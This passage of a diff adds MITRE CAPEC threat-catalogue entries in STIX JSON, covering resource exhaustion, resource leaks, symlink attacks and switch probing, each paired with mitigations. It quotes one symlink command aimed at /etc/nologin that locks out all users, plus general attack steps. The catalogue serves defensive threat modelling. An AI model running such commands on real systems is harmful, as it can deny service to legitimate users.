+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect environment variables against unauthorized read and write access.", + "id": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e351819c-a8ce-4628-bc2d-fe25172f524f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the configuration files which contain environment variables against illegitimate read and write access.", + "id": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f927e9e7-a3c2-4e14-8da4-37711f2f0161", + "modified": "2022-02-22T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b2e048e-f266-4abc-a3e7-0430607e7aeb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the least privilege principles. 
If a process has no legitimate reason to read an environment variable do not give that privilege.", + "id": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36c8f1a2-fc68-4417-ba38-adaa3e68a90d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). 
Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.", + "external_references": [ + { + "external_id": "CAPEC-130", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-1325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1325.html" + }, + { + "description": "Endpoint Denial of Service:Application Exhaustion Flood", + "external_id": "T1499.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/003" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Excessive Allocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target." 
+ ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de" + ], + "x_capec_prerequisites": [ + "The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the amount of resources that are accessible to unprivileged users.", + "id": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Consider all potentially relevant properties when validating input.", + "id": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--282aa96a-4a57-42b1-826a-e6e4abbd87db", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51e066b9-7488-4231-91fa-099bbb87c489", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use resource-limiting settings, if possible.", + "id": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98433369-590b-48b9-a19e-d159dde960e1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.", + "external_references": [ + { + "external_id": "CAPEC-131", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html" + 
}, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Resource Leak Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.\n In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. 
Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.\n Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).", + "id": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adc4413e-bddd-423e-ba63-df78f79cc02f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)", + "id": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.", + "id": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dbe99895-80e2-48af-966a-55f26aadd3d5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.", + "external_references": [ + { + "external_id": "CAPEC-132", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/132.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "description": "Boot or Logon Autostart Execution:Shortcut Modification", + "external_id": "T1547.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/009" + }, + { + "description": "Shaun Colley, Crafting Symlinks for Fun and Profit", + "external_id": "REF-13", + "source_name": "reference_from_CAPEC", + "url": "http://www.infosecwriters.com/texts.php?op=display&id=159" + } + ], + "id": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Symlink Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary creates a symlink with the \"same\" name as the file which the application is intending to write to. The application will write to the file- \"causing the data to be written where the symlink is pointing\". An attack like this can be demonstrated as follows:\n root# vulprog myFile\n {...program does some processing...]\n \n adversary# ln –s /etc/nologin myFile\n [...program writes to 'myFile', which points to /etc/nologin...]\n \n \n In the above example, the root user ran a program with poorly written file handling routines, providing the filename \"myFile\" to vulnprog for the relevant data to be written to. However, the adversary happened to be looking over the shoulder of \"root\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Adversary identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.

  2. Techniques
    The adversary writes to files in different directories to check whether the application has sufficient checking before file operations.
    The adversary creates symlinks to files in different directories.

Experiment

  1. Try to create symlinks to different files: The adversary then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.

  2. Techniques
    The adversary monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the adversary can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
    The adversary may need a little guesswork on the filenames on which the target application would operate.
    The adversary tries to create symlinks to the various filenames.

Exploit

  1. Target application operates on created symlinks to sensitive files: The adversary is able to create symlinks to sensitive files while the target application is operating on the file.

  2. Techniques
    Create the symlink to the sensitive file such as configuration files, etc.
", + "x_capec_extended_description": "\n The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications.\n In some variants of this attack the adversary may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the adversary may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the adversary to control the actions of the target or to cause the target to expose information to the adversary. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the adversary would normally have.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The adversary must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link." 
+ ], + "x_capec_skills_required": { + "High": "To identify the files and create the symlinks during the file operation time window", + "Low": "To create symlinks" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "id": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e73cf8-4cb5-4ae9-9a70-c2ebefdf62fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "spec_version": "2.1", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use randomly generated file names for temporary files. 
Give the files restrictive permissions.", + "id": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cf8f1cf-51b6-4745-843d-2b4655e99ce6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "spec_version": "2.1", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. 
Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.", + "external_references": [ + { + "external_id": "CAPEC-133", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/133.html" + }, + { + "external_id": "CWE-912", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/912.html" + } + ], + "id": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Try All Common Switches", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application: Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.

  2. Techniques
    Search via internet for known, published applications that allow option switches.
    Use automated tools to scan known ports to identify applications that might be accessible
  3. Authenticate to application: Authenticate to the application, if required, in order to explore it.

  4. Techniques
    Use published credentials to access system.
    Find unpublished credentails to access service.
    Use other attack pattern or weakness to bypass authentication.

Experiment

  1. Try all common switches: Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.

  2. Techniques
    Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.
    Use automated tools to run the application with common switches and observe the output

Exploit

  1. Use sensitive processing or configuration information: Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application

  2. Techniques
    Using application information, formulate an attack on the application
", + "x_capec_prerequisites": [ + "The attacker must be able to control the options or switches sent to the target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Minimize switch and option functionality to only that necessary for correct function of the command.", + "id": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9849d6f7-11c6-49c0-a3b7-a87ba59d92c3", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove all debug and testing options from production code.", + "id": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": 
